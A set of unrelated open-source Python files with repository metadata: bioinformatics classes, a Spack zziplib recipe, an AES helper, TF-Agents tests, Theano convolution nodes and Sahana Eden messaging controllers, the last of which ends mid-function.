:type gene: :class:`macsypy.gene.Gene` object.
:rtype: boolean.
"""
return self.name == gene.name
class Homolog:
def __init__(self, name, system, loner, profile, gene_ref, aligned=False):
super(Homolog, self).__init__(name, system, loner, profile)
self.ref = gene_ref
self.aligned = aligned
@property
def system(self):
"""
:return: the System that owns this Gene
:rtype: :class:`macsypy.system.System` object
"""
return self.gene.system
def __eq__(self, gene):
"""
:return: True if the gene names (gene.name) are the same, False otherwise.
:param gene: the query of the test
:type gene: :class:`macsypy.gene.Gene` object.
:rtype: boolean.
"""
return self.gene.name == gene.name
def is_aligned(self):
"""
:return: True if this gene homolog is aligned to its homolog, False otherwise.
:rtype: boolean
"""
return self.aligned
|
bioinfo-center-pasteur-fr/python-course-1
|
source/_static/code/homolog.py
|
Python
|
cc0-1.0
| 1,585
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Zziplib(AutotoolsPackage):
"""The zziplib provides read access to zipped files in a zip-archive, using
compression based solely on free algorithms provided by zlib. It also
provides a functionality to overlay the archive filesystem with the
filesystem of the operating system environment."""
homepage = "https://github.com/gdraheim/zziplib"
url = "https://github.com/gdraheim/zziplib/archive/v0.13.69.tar.gz"
# Switch to CMake from 0.13.70, first working release is 0.13.71
version('0.13.72', sha256='93ef44bf1f1ea24fc66080426a469df82fa631d13ca3b2e4abaeab89538518dc')
version('0.13.69', sha256='846246d7cdeee405d8d21e2922c6e97f55f24ecbe3b6dcf5778073a88f120544')
patch('python2to3.patch', when='@:0.13.69')
build_directory = 'spack-build'
depends_on('python@3.5:', type='build', when='@0.13.71:')
depends_on('cmake', type='build', when='@0.13.71:')
depends_on('python', type='build')
depends_on('zlib')
# see zzip/CMakeLists.txt
depends_on('coreutils', type='build', when='@0.13.71:')
depends_on('pkgconfig', type='build', when='@0.13.71:')
@when('@0.13.71:')
def autoreconf(self, spec, prefix):
touch('configure')
@when('@0.13.71:')
def _cmake_args(self):
spec = self.spec
args = []
zlib = spec['zlib']
# Do not use self.define('VAR', path) unless a CMakePackage
args.extend([
'-DZLIB_LIBRARY:FILEPATH={0}'.format(zlib.libs[0]),
'-DZLIB_INCLUDE_DIR:FILEPATH={0}'.format(zlib.headers.directories[0])
])
args.append('-DPYTHON_EXECUTABLE:FILEPATH={0}'.format(
spec['python'].command.path))
args.append('-DCMAKE_INSTALL_PREFIX:PATH={0}'.format(spec.prefix))
return args
def configure_args(self):
args = ['--with-zlib={0}'.format(self.spec['zlib'].prefix)]
return args
@when('@0.13.71:')
def configure(self, spec, prefix):
with working_dir('spack-build', create=True):
cmake_args = self._cmake_args()
cmake('..', *cmake_args)
|
LLNL/spack
|
var/spack/repos/builtin/packages/zziplib/package.py
|
Python
|
lgpl-2.1
| 2,327
|
import base64
from Crypto.Cipher import AES
class Crypt(object):
"""
Classe pour le chiffrement AES256
"""
def __init__(self, key, iv):
self._key = key
self._iv = iv
self._mode = AES.MODE_CBC
self._block_size = AES.block_size
def pad(self, s):
return s + b"\0" * (self._block_size - len(s) % self._block_size)
def aes_encrypt(self, plain_text):
"""
Chiffrement AES256
Utilise AES256 pour chiffrer une chaine de caractères et encode en base64
:param plain_text:
:return:
"""
encryptor = AES.new(self._key, self._mode, self._iv)
padded_text = self.pad(plain_text.encode('utf-8'))
return base64.b64encode(encryptor.encrypt(padded_text))
def aes_decrypt(self, cipher_text):
"""
Déchiffrement AES256
Décode en base64 la chaine de caractères et utilise AES256 pour la déchiffrer
:param cipher_text:
:return:
"""
decryptor = AES.new(self._key, self._mode, self._iv)
plain_text = decryptor.decrypt(base64.b64decode(cipher_text))
return plain_text.rstrip(b"\0").decode('utf-8')
|
NextINpact/LaPresseLibreSDK
|
python_django/sdk_lpl/utils/crypt.py
|
Python
|
mit
| 1,192
|
from distutils.core import setup
requires = [
'rsa>=3.4.2',
'requests>=2.11.1'
]
VERSION='0.7'
setup(
name = 'bankson',
packages = ['bankson'],
version = VERSION,
install_requires=requires,
description = 'Bankson API client',
author = 'Codesense',
author_email = 'niklas@codesense.fi',
url = 'https://github.com/banksonfi/bankson-python',
download_url = 'https://github.com/banksonfi/bankson-python/tarball/' + VERSION,
keywords = ['bankson'], # arbitrary keywords
classifiers = [],
)
|
banksonfi/bankson-python
|
setup.py
|
Python
|
mit
| 526
|
import urllib2
import json
header = '''
<header class="navbar navbar-static-top bs-docs-nav" id="top" role="banner" style="background-color:rgba(2,132,130,0.7); z-index: 9;">
<div class="container">
<div class="navbar-header">
<a href="../" class="navbar-brand">XBT WALLET</a>
</div>
<nav class="collapse navbar-collapse bs-navbar-collapse" role="navigation">
<ul class="nav navbar-nav" >
<li><a href="/wallet">WALLET</a></li>
</ul>
<ul class="nav navbar-nav navbar-right">
<li><a href="/Logout">LOGOUT</a></li>
</ul>
</nav>
</div>
</header>
'''
footer = '''
<script src="/static/bootstrap.min.js"></script>
'''
def getHeader(pageRoute="/"):
return header
def getFooter(pageRoute="/"):
return footer
|
liezl200/xbtwallet
|
header.py
|
Python
|
mit
| 773
|
#!/usr/bin/python
# compute new sensitivity from formulae in manual
import math
print "Tilt Sensitivity Calculator"
print "X1 refers to the tilt measurement, in arc sec"
print "R0/R1 refer to the gravimeter readings, in mGal"
print "Get the current tilt sensitivity from data files or the Setup menu"
oldSens = float(raw_input("Current tilt sensitivity: "))
r0 = float(raw_input("R0 [mGal] : "))
r1 = float(raw_input("R1 [mGal] : "))
x1 = float(raw_input("X1 [arc sec]: "))
K = math.sqrt( 1 + (87000 * (r0-r1)/(x1*x1)) )
newSens = K * oldSens
print "New tilt Sensitivity: %f"%newSens
|
inkenbrandt/Earth_Tides
|
Micrograv/util/tilt_sens.py
|
Python
|
gpl-2.0
| 593
|
# coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for neural_epsilon_greedy_agent.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf # pylint: disable=g-explicit-tensorflow-version-import
from tf_agents.bandits.agents import neural_epsilon_greedy_agent
from tf_agents.bandits.networks import global_and_arm_feature_network
from tf_agents.bandits.specs import utils as bandit_spec_utils
from tf_agents.networks import network
from tf_agents.specs import tensor_spec
from tf_agents.trajectories import time_step as ts
class DummyNet(network.Network):
def __init__(self, observation_spec, action_spec, name=None):
super(DummyNet, self).__init__(observation_spec, state_spec=(), name=name)
action_spec = tf.nest.flatten(action_spec)[0]
num_actions = action_spec.maximum - action_spec.minimum + 1
# Store custom layers that can be serialized through the Checkpointable API.
self._dummy_layers = [
tf.keras.layers.Dense(
num_actions,
kernel_initializer=tf.constant_initializer([[1, 1.5, 2],
[1, 1.5, 4]]),
bias_initializer=tf.constant_initializer([[1], [1], [-10]]))
]
def call(self, inputs, step_type=None, network_state=()):
del step_type
inputs = tf.cast(inputs, tf.float32)
for layer in self._dummy_layers:
inputs = layer(inputs)
return inputs, network_state
class AgentTest(tf.test.TestCase):
def setUp(self):
super(AgentTest, self).setUp()
tf.compat.v1.enable_resource_variables()
self._obs_spec = tensor_spec.TensorSpec([2], tf.float32)
self._time_step_spec = ts.time_step_spec(self._obs_spec)
self._action_spec = tensor_spec.BoundedTensorSpec(
dtype=tf.int32, shape=(), minimum=0, maximum=2)
self._observation_spec = self._time_step_spec.observation
def testPolicyWithEpsilonGreedy(self):
reward_net = DummyNet(self._observation_spec, self._action_spec)
agent = neural_epsilon_greedy_agent.NeuralEpsilonGreedyAgent(
self._time_step_spec,
self._action_spec,
reward_network=reward_net,
optimizer=None,
epsilon=0.1)
observations = tf.constant([[1, 2], [3, 4]], dtype=tf.float32)
time_steps = ts.restart(observations, batch_size=2)
policy = agent.policy
action_step = policy.action(time_steps)
# Batch size 2.
self.assertAllEqual([2], action_step.action.shape)
self.evaluate(tf.compat.v1.global_variables_initializer())
actions = self.evaluate(action_step.action)
self.assertIn(actions[0], [0, 1, 2])
self.assertIn(actions[1], [0, 1, 2])
def testPolicyWithEpsilonGreedyAndActionMask(self):
reward_net = DummyNet(self._observation_spec, self._action_spec)
obs_spec = (tensor_spec.TensorSpec([2], tf.float32),
tensor_spec.TensorSpec([3], tf.int32))
agent = neural_epsilon_greedy_agent.NeuralEpsilonGreedyAgent(
ts.time_step_spec(obs_spec),
self._action_spec,
reward_network=reward_net,
optimizer=None,
observation_and_action_constraint_splitter=lambda x: (x[0], x[1]),
epsilon=0.1)
observations = (tf.constant([[1, 2], [3, 4]], dtype=tf.float32),
tf.constant([[0, 0, 1], [0, 1, 0]], dtype=tf.int32))
time_steps = ts.restart(observations, batch_size=2)
policy = agent.policy
action_step = policy.action(time_steps)
# Batch size 2.
self.assertAllEqual([2], action_step.action.shape)
self.evaluate(tf.compat.v1.global_variables_initializer())
actions = self.evaluate(action_step.action)
self.assertAllEqual(actions, [2, 1])
def testTrainPerArmAgent(self):
obs_spec = bandit_spec_utils.create_per_arm_observation_spec(2, 3, 3)
time_step_spec = ts.time_step_spec(obs_spec)
reward_net = (
global_and_arm_feature_network.create_feed_forward_common_tower_network(
obs_spec, (4, 3), (3, 4), (4, 2)))
optimizer = tf.compat.v1.train.GradientDescentOptimizer(learning_rate=0.1)
agent = neural_epsilon_greedy_agent.NeuralEpsilonGreedyAgent(
time_step_spec,
self._action_spec,
reward_network=reward_net,
optimizer=optimizer,
epsilon=0.1,
accepts_per_arm_features=True)
observations = {
bandit_spec_utils.GLOBAL_FEATURE_KEY:
tf.constant([[1, 2], [3, 4]], dtype=tf.float32),
bandit_spec_utils.PER_ARM_FEATURE_KEY:
tf.cast(
tf.reshape(tf.range(18), shape=[2, 3, 3]), dtype=tf.float32)
}
time_steps = ts.restart(observations, batch_size=2)
policy = agent.policy
action_step = policy.action(time_steps)
self.evaluate(tf.compat.v1.initialize_all_variables())
actions = self.evaluate(action_step.action)
self.assertAllEqual(actions.shape, (2,))
if __name__ == '__main__':
tf.test.main()
|
tensorflow/agents
|
tf_agents/bandits/agents/neural_epsilon_greedy_agent_test.py
|
Python
|
apache-2.0
| 5,518
|
'''
Created by auto_sdk on 2015.11.04
'''
from top.api.base import RestApi
class LogisticsConsignResendRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.company_code = None
self.feature = None
self.is_split = None
self.out_sid = None
self.seller_ip = None
self.sub_tid = None
self.tid = None
def getapiname(self):
return 'taobao.logistics.consign.resend'
|
colaftc/webtool
|
top/api/rest/LogisticsConsignResendRequest.py
|
Python
|
mit
| 457
|
"""
convolutional nodes
"""
from __future__ import division, absolute_import
from __future__ import print_function, unicode_literals
import numpy as np
import theano
import theano.tensor as T
from .. import core
def conv_output_length(input_size, conv_size, stride, pad):
"""
calculates the output size along a single axis for a conv operation
"""
if input_size is None:
return None
without_stride = input_size + 2 * pad - conv_size + 1
# equivalent to np.ceil(without_stride / stride)
output_size = (without_stride + stride - 1) // stride
return output_size
def conv_output_shape(input_shape,
num_filters,
axes,
conv_shape,
strides,
pads):
"""
compute output shape for a conv
"""
output_shape = list(input_shape)
assert 1 not in axes
output_shape[1] = num_filters
for axis, conv_size, stride, pad in zip(axes,
conv_shape,
strides,
pads):
output_shape[axis] = conv_output_length(input_shape[axis],
conv_size,
stride,
pad)
return tuple(output_shape)
def conv_parse_pad(filter_size, pad):
if pad == "valid":
return (0,) * len(filter_size)
elif pad == "full":
return tuple([x - 1 for x in filter_size])
elif pad in ("same", "half"):
new_pad = []
for f in filter_size:
assert f % 2
new_pad += [f // 2]
return tuple(new_pad)
else:
assert len(pad) == len(filter_size)
return pad
@core.register_node("conv_2d")
class Conv2DNode(core.NodeImpl):
"""
node for 2D convolution
"""
hyperparameter_names = ("inits",
"num_filters",
"filter_size",
"conv_stride",
"stride",
"conv_pad",
"pad")
def compute_output(self, network, in_vw):
# gather hyperparameters
num_filters = network.find_hyperparameter(["num_filters"])
filter_size = network.find_hyperparameter(["filter_size"])
stride = network.find_hyperparameter(["conv_stride", "stride"], (1, 1))
pad = network.find_hyperparameter(["conv_pad", "pad"], "valid")
pad = conv_parse_pad(filter_size, pad)
# HACK figure out if this is necessary
# convert numerical pad to valid or full
# if pad == (0, 0):
# pad = "valid"
# elif pad == tuple([fs - 1 for fs in filter_size]):
# pad = "full"
# assert pad in ["valid", "full"]
assert len(filter_size) == 2
# create weight
num_channels = in_vw.shape[1]
filter_shape = (num_filters, num_channels) + tuple(filter_size)
W = network.create_vw(
name="weight",
is_shared=True,
shape=filter_shape,
tags={"parameter", "weight"},
default_inits=[],
).variable
out_var = T.nnet.conv2d(input=in_vw.variable,
filters=W,
input_shape=in_vw.shape,
filter_shape=filter_shape,
border_mode=pad,
subsample=stride)
out_shape = conv_output_shape(input_shape=in_vw.shape,
num_filters=num_filters,
axes=(2, 3),
conv_shape=filter_size,
strides=stride,
pads=pad)
network.create_vw(
"default",
variable=out_var,
shape=out_shape,
tags={"output"},
)
@core.register_node("conv_3d")
class Conv3DNode(core.NodeImpl):
"""
node for 3D convolution
"""
hyperparameter_names = ("inits",
"num_filters",
"filter_size",
"conv_stride",
"stride",
"conv_pad",
"pad",
"include_bias")
def compute_output(self, network, in_vw):
# gather hyperparameters
num_filters = network.find_hyperparameter(["num_filters"])
filter_size = network.find_hyperparameter(["filter_size"])
stride = network.find_hyperparameter(["conv_stride", "stride"],
(1, 1, 1))
pad = network.find_hyperparameter(["conv_pad", "pad"], "valid")
include_bias = network.find_hyperparameter(["include_bias"], False)
assert len(filter_size) == 3
assert pad == "valid"
# create weight
num_channels = in_vw.shape[1]
filter_shape = (num_filters, num_channels) + tuple(filter_size)
W = network.create_vw(
name="weight",
is_shared=True,
shape=filter_shape,
tags={"parameter", "weight"},
default_inits=[],
).variable
# create bias
if include_bias:
b = network.create_vw(
name="bias",
is_shared=True,
shape=(num_filters,),
tags={"parameter", "bias"},
default_inits=[],
).variable
else:
b = T.zeros(num_filters)
from theano.tensor.nnet.Conv3D import conv3D
# conv3D takes V in order: (batch, row, column, time, in channel)
# and W in order: (out channel, row, column, time ,in channel)
# but we keep the dimensions that W is stored in consistent with other
# convolutions, so we have to dimshuffle here
out_var = conv3D(V=in_vw.variable.dimshuffle(0, 2, 3, 4, 1),
W=W.dimshuffle(0, 2, 3, 4, 1),
b=b,
d=stride)
out_shape = conv_output_shape(input_shape=in_vw.shape,
num_filters=num_filters,
axes=(2, 3, 4),
conv_shape=filter_size,
strides=stride,
pads=(0, 0, 0))
network.create_vw(
"default",
variable=out_var,
shape=out_shape,
tags={"output"},
)
@core.register_node("conv_3d2d")
class Conv3D2DNode(core.NodeImpl):
"""
performs 3D convolution via 2D convolution
see: theano.tensor.nnet.conv3d2d.conv3d
"""
hyperparameter_names = ("inits",
"num_filters",
"filter_size",
"conv_stride",
"stride",
"conv_pad",
"pad")
def compute_output(self, network, in_vw):
# gather hyperparameters
num_filters = network.find_hyperparameter(["num_filters"])
filter_size = network.find_hyperparameter(["filter_size"])
stride = network.find_hyperparameter(["conv_stride", "stride"],
(1, 1, 1))
pad = network.find_hyperparameter(["conv_pad", "pad"], "valid")
assert len(filter_size) == 3
assert pad == "valid"
assert stride == (1, 1, 1)
# create weight
num_channels = in_vw.shape[1]
filter_shape = (num_filters, num_channels) + tuple(filter_size)
W = network.create_vw(
name="weight",
is_shared=True,
shape=filter_shape,
tags={"parameter", "weight"},
default_inits=[],
).variable
from theano.tensor.nnet.conv3d2d import conv3d
# takes signals in order: (batch, time, channels, row, column)
# and filters in order: (out channel, time, in channels, row, column)
# but we keep the dimensions that W is stored in consistent with other
# convolutions, so we have to dimshuffle here
order = (0, 2, 1, 3, 4)
out_var = conv3d(signals=in_vw.variable.dimshuffle(*order),
filters=W.dimshuffle(*order),
signals_shape=[in_vw.shape[o] for o in order],
filters_shape=[filter_shape[o] for o in order],
# HACK as of 20150916, conv3d does a check
# if isinstance(border_mode, str), so we manually
# cast as a string
border_mode=str("valid"))
out_shape = conv_output_shape(input_shape=in_vw.shape,
num_filters=num_filters,
axes=(2, 3, 4),
conv_shape=filter_size,
strides=stride,
pads=conv_parse_pad(filter_size, pad))
network.create_vw(
"default",
variable=out_var,
shape=out_shape,
tags={"output"},
)
|
diogo149/treeano
|
treeano/nodes/conv.py
|
Python
|
apache-2.0
| 9,525
|
# -*- coding: utf-8 -*-
"""
Messaging Module - Controllers
"""
if not settings.has_module(c):
raise HTTP(404, body="Module disabled: %s" % c)
# -----------------------------------------------------------------------------
def index():
""" Module's Home Page """
module_name = settings.modules[c].get("name_nice")
response.title = module_name
return {"module_name": module_name,
}
# -----------------------------------------------------------------------------
def basestation():
""" RESTful CRUD controller for Base Stations """
# Pre-processor
def prep(r):
# Function to call for all Site Instance Types
from s3db.org import org_site_prep
org_site_prep(r)
return True
s3.prep = prep
return s3_rest_controller()
# =============================================================================
def compose():
""" Compose a Message which can be sent to a pentity via a number of different communications channels """
return msg.compose()
# =============================================================================
def message():
"""
RESTful CRUD controller for the master message log
"""
tablename = "msg_message"
table = s3db.msg_message
table.instance_type.readable = True
table.instance_type.label = T("Channel")
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Message Details"),
title_list = T("Message Log"),
label_list_button = T("View Message Log"),
msg_list_empty = T("No Messages currently in the Message Log"),
)
def postp(r, output):
if r.interactive:
# Normal Action Buttons
s3_action_buttons(r)
# Custom Action Buttons
s3.actions += [{"label": s3_str(T("Mark Sender")),
"url": URL(f = "mark_sender",
args = ["[id]"],
),
"_class": "action-btn",
},
]
return output
s3.postp = postp
s3db.configure(tablename,
deletable = False,
editable = False,
insertable = False,
)
return s3_rest_controller()
# -----------------------------------------------------------------------------
def contact():
"""
RESTful CRUD controller for the Contact Form
"""
def prep(r):
if not auth.s3_has_role("ADMIN"):
r.method = "create"
return True
s3.prep = prep
return s3_rest_controller()
# =============================================================================
def mark_sender():
"""
Assign priority to the given sender
"""
try:
mid = request.args[0]
except:
raise SyntaxError
mtable = s3db.msg_message
stable = s3db.msg_sender
# @ToDo: Replace 2 queries with Join
srecord = db(mtable.id == mid).select(mtable.from_address,
limitby = (0, 1),
).first()
sender = srecord.from_address
record = db(stable.sender == sender).select(stable.id,
limitby = (0, 1),
).first()
if record:
args = "update"
else:
args = "create"
redirect(URL(f = "sender",
args = args,
vars = {"sender": sender},
))
# =============================================================================
def outbox():
""" View the contents of the Outbox """
if not auth.s3_logged_in():
session.error = T("Requires Login!")
redirect(URL(c="default", f="user",
args = "login",
))
from s3db.pr import pr_PersonEntityRepresent
tablename = "msg_outbox"
table = s3db[tablename]
table.message_id.label = T("Message")
table.message_id.writable = False
table.message_id.readable = True
table.pe_id.readable = True
table.pe_id.label = T("Recipient")
table.message_id.represent = s3db.msg_message_represent
table.pe_id.represent = pr_PersonEntityRepresent(default_label = "")
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Message Details"),
title_list = T("Outbox"),
label_list_button = T("View Outbox"),
label_delete_button = T("Delete Message"),
msg_record_deleted = T("Message deleted"),
msg_list_empty = T("No Messages currently in Outbox"),
)
def postp(r, output):
if isinstance(output, dict):
add_btn = A(T("Compose"),
_class = "action-btn",
_href = URL(f="compose"),
)
output["rheader"] = add_btn
return output
s3.postp = postp
s3db.configure(tablename,
# Permissions-based
#deletable = False,
editable = False,
insertable = False,
)
return s3_rest_controller()
# -----------------------------------------------------------------------------
def email_outbox():
"""
RESTful CRUD controller for the Email Outbox
- all Outbound Email Messages are visible here
"""
if not auth.s3_logged_in():
session.error = T("Requires Login!")
redirect(URL(c="default", f="user",
args = "login",
))
tablename = "msg_email"
table = s3db.msg_email
s3.filter = (table.inbound == False)
table.inbound.readable = False
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Email Details"),
title_list = T("Sent Emails"),
label_list_button = T("View Sent Emails"),
label_delete_button = T("Delete Email"),
msg_record_deleted = T("Email deleted"),
msg_list_empty = T("No Emails currently in Outbox"),
)
def postp(r, output):
if isinstance(output, dict):
add_btn = A(T("Compose"),
_class = "action-btn",
_href = URL(f="compose"),
)
output["rheader"] = add_btn
return output
s3.postp = postp
s3db.configure(tablename,
# Permissions-based
#deletable = False,
editable = False,
insertable = False,
listadd = False,
list_fields = ["date",
"to_address",
"subject",
"body",
],
)
return s3_rest_controller(c, "email")
# -----------------------------------------------------------------------------
def facebook_outbox():
"""
RESTful CRUD controller for the Facebook Outbox
- all Outbound Facebook Messages are visible here
"""
if not auth.s3_logged_in():
session.error = T("Requires Login!")
redirect(URL(c="default", f="user",
args = "login",
))
tablename = "msg_facebook"
table = s3db.msg_facebook
s3.filter = (table.inbound == False)
table.inbound.readable = False
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Post Details"),
title_list = T("Sent Posts"),
label_list_button = T("View Sent Posts"),
label_delete_button = T("Delete Post"),
msg_record_deleted = T("Post deleted"),
msg_list_empty = T("No Posts currently in Outbox"),
)
#def postp(r, output):
# if isinstance(output, dict):
# add_btn = A(T("Compose"),
# _class="action-btn",
# _href=URL(f="compose")
# )
# output["rheader"] = add_btn
# return output
#s3.postp = postp
s3db.configure(tablename,
# Permissions-based
#deletable = False,
editable = False,
insertable = False,
listadd = False,
list_fields = ["date",
#"to_address",
"body",
],
)
return s3_rest_controller(c, "facebook")
# -----------------------------------------------------------------------------
def sms_outbox():
"""
RESTful CRUD controller for the SMS Outbox
- all sent SMS are visible here
"""
if not auth.s3_logged_in():
session.error = T("Requires Login!")
redirect(URL(c="default", f="user",
args = "login",
))
tablename = "msg_sms"
table = s3db.msg_sms
s3.filter = (table.inbound == False)
table.inbound.readable = False
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("SMS Details"),
title_list = T("Sent SMS"),
label_list_button = T("View Sent SMS"),
label_delete_button = T("Delete SMS"),
msg_record_deleted = T("SMS deleted"),
msg_list_empty = T("No SMS currently in Outbox"),
)
def postp(r, output):
if isinstance(output, dict):
add_btn = A(T("Compose"),
_class = "action-btn",
_href = URL(f="compose"),
)
output["rheader"] = add_btn
return output
s3.postp = postp
s3db.configure(tablename,
# Permissions-based
#deletable = False,
editable = False,
insertable = False,
listadd = False,
list_fields = ["date",
"to_address",
"body",
],
)
return s3_rest_controller(c, "sms")
# -----------------------------------------------------------------------------
def twitter_outbox():
"""
RESTful CRUD controller for the Twitter Outbox
- all sent Tweets are visible here
"""
if not auth.s3_logged_in():
session.error = T("Requires Login!")
redirect(URL(c="default", f="user",
args = "login",
))
tablename = "msg_twitter"
table = s3db.msg_twitter
s3.filter = (table.inbound == False)
table.inbound.readable = False
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Tweet Details"),
title_list = T("Sent Tweets"),
label_list_button = T("View Sent Tweets"),
label_delete_button = T("Delete Tweet"),
msg_record_deleted = T("Tweet deleted"),
msg_list_empty = T("No Tweets currently in Outbox"),
)
def postp(r, output):
if isinstance(output, dict):
add_btn = A(T("Compose"),
_class = "action-btn",
_href = URL(f="compose"),
)
output["rheader"] = add_btn
return output
s3.postp = postp
s3db.configure(tablename,
# Permissions-based
#deletable = False,
editable = False,
insertable = False,
listadd = False,
list_fields = ["date",
"to_address",
"body",
],
)
return s3_rest_controller(c, "twitter")
# =============================================================================
def inbox():
"""
RESTful CRUD controller for the Inbox
- all Inbound Messages are visible here
"""
if not auth.s3_logged_in():
session.error = T("Requires Login!")
redirect(URL(c="default", f="user",
args = "login",
))
table = s3db.msg_message
s3.filter = (table.inbound == True)
table.inbound.readable = False
tablename = "msg_message"
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Message Details"),
title_list = T("InBox"),
label_list_button = T("View InBox"),
label_delete_button = T("Delete Message"),
msg_record_deleted = T("Message deleted"),
msg_list_empty = T("No Messages currently in InBox"),
)
s3db.configure(tablename,
# Permissions-based
#deletable = False,
editable = False,
insertable = False,
list_fields = ["date",
"channel_id",
"from_address",
"body",
],
)
return s3_rest_controller(c, "message")
# -----------------------------------------------------------------------------
def email_inbox():
"""
RESTful CRUD controller for the Email Inbox
- all Inbound Email Messages are visible here
"""
if not auth.s3_logged_in():
session.error = T("Requires Login!")
redirect(URL(c="default", f="user",
args = "login",
))
s3.filter = (FS("inbound") == True)
from s3 import S3SQLCustomForm, S3SQLInlineComponent
crud_form = S3SQLCustomForm("date",
"subject",
"from_address",
"body",
S3SQLInlineComponent(
"attachment",
name = "document_id",
label = T("Attachments"),
fields = ["document_id",],
),
)
tablename = "msg_email"
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Email Details"),
title_list = T("Email InBox"),
label_list_button = T("View Email InBox"),
label_delete_button = T("Delete Email"),
msg_record_deleted = T("Email deleted"),
msg_list_empty = T("No Emails currently in InBox"),
)
s3db.configure(tablename,
crud_form = crud_form,
# Permissions-based
#deletable = False,
editable = False,
insertable = False,
list_fields = ["date",
"from_address",
"subject",
"body",
(T("Attachments"), "attachment.document_id"),
],
)
def prep(r):
s3db.msg_email.inbound.readable = False
if r.id:
s3db.msg_attachment.document_id.label = ""
return True
s3.prep = prep
return s3_rest_controller(c, "email")
# =============================================================================
def rss():
"""
RESTful CRUD controller for RSS feed posts
"""
if not auth.s3_has_role("ADMIN"):
auth.permission.fail()
tablename = "msg_rss"
table = s3db.msg_rss
# To represent the description suitably
# If it is an image display an image
#table.description.represent = lambda description: HTML(description)
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("RSS Post Details"),
title_list = T("RSS Posts"),
label_list_button = T("View RSS Posts"),
label_delete_button = T("Delete Post"),
msg_record_deleted = T("RSS Post deleted"),
msg_list_empty = T("No Posts available"),
)
s3db.configure(tablename,
# Permissions-based
#deletable = False,
editable = False,
insertable = False,
list_fields = ["date",
"body",
],
)
return s3_rest_controller()
# -----------------------------------------------------------------------------
def sms_inbox():
"""
RESTful CRUD controller for the SMS Inbox
- all Inbound SMS Messages go here
"""
if not auth.s3_logged_in():
session.error = T("Requires Login!")
redirect(URL(c="default", f="user",
args = "login",
))
tablename = "msg_sms"
table = s3db[tablename]
s3.filter = (table.inbound == True)
table.inbound.readable = False
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("SMS Details"),
title_list = T("SMS InBox"),
label_list_button = T("View SMS InBox"),
label_delete_button = T("Delete SMS"),
msg_record_deleted = T("SMS deleted"),
msg_list_empty = T("No SMS currently in InBox"),
)
s3db.configure(tablename,
# Permissions-based
#deletable = False,
editable = False,
insertable = False,
list_fields = ["date",
"from_address",
"body",
],
)
return s3_rest_controller(c, "sms")
# -----------------------------------------------------------------------------
def twitter():
"""
Twitter RESTful Controller
@ToDo: Action Button to update async
"""
s3db.configure("msg_twitter",
editable = False,
insertable = False,
list_fields = ["date",
"from_address",
"to_address",
"body",
],
)
return s3_rest_controller()
# -----------------------------------------------------------------------------
def twitter_inbox():
"""
RESTful CRUD controller for the Twitter Inbox
- all Inbound Tweets (Directed Messages) are visible here
"""
if not auth.s3_logged_in():
session.error = T("Requires Login!")
redirect(URL(c="default", f="user",
args = "login",
))
tablename = "msg_twitter"
table = s3db.msg_twitter
s3.filter = (table.inbound == True)
table.inbound.readable = False
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Tweet Details"),
title_list = T("Twitter InBox"),
label_list_button = T("View Twitter InBox"),
label_delete_button = T("Delete Tweet"),
msg_record_deleted = T("Tweet deleted"),
msg_list_empty = T("No Tweets currently in InBox"),
)
s3db.configure(tablename,
editable = False,
insertable = False,
list_fields = ["date",
"from_address",
"body",
],
)
return s3_rest_controller(c, "twitter")
# =============================================================================
def tropo():
"""
Receive a JSON POST from the Tropo WebAPI
@see: https://www.tropo.com/docs/webapi/newhowitworks.htm
"""
# Stored in modules/tropo.py
from tropo import Tropo, Session
try:
s = Session(request.body.read())
t = Tropo()
# This is their service contacting us, so parse their request
try:
row_id = s.parameters["row_id"]
# This is an Outbound message which we've requested Tropo to send for us
table = s3db.msg_tropo_scratch
query = (table.row_id == row_id)
row = db(query).select(limitby = (0, 1),
).first()
# Send the message
#t.message(say_obj={"say":{"value":row.message}},to=row.recipient,network=row.network)
t.call(to=row.recipient, network=row.network)
t.say(row.message)
# Update status to sent in Outbox
outbox = s3db.msg_outbox
db(outbox.id == row.row_id).update(status = 2)
# @ToDo: Set message log to actioned
#log = s3db.msg_log
#db(log.id == row.message_id).update(actioned=True)
# Clear the Scratchpad
db(query).delete()
return t.RenderJson()
except:
# This is an Inbound message
try:
message = s.initialText
# This is an SMS/IM
# Place it in the InBox
uuid = s.id
recipient = s.to["id"]
try:
fromaddress = s.fromaddress["id"]
except:
# SyntaxError: s.from => invalid syntax (why!?)
fromaddress = ""
# @ToDo: Update to new model
#s3db.msg_log.insert(uuid=uuid, fromaddress=fromaddress,
# recipient=recipient, message=message,
# inbound=True)
# Send the message to the parser
reply = msg.parse_message(message)
t.say([reply])
return t.RenderJson()
except:
# This is a Voice call
# - we can't handle these yet
raise HTTP(501)
except:
# GET request or some random POST
pass
# =============================================================================
@auth.s3_requires_membership(1)
def sms_outbound_gateway():
""" SMS Outbound Gateway selection for the messaging framework """
# CRUD Strings
s3.crud_strings["msg_sms_outbound_gateway"] = Storage(
label_create = T("Create SMS Outbound Gateway"),
title_display = T("SMS Outbound Gateway Details"),
title_list = T("SMS Outbound Gateways"),
title_update = T("Edit SMS Outbound Gateway"),
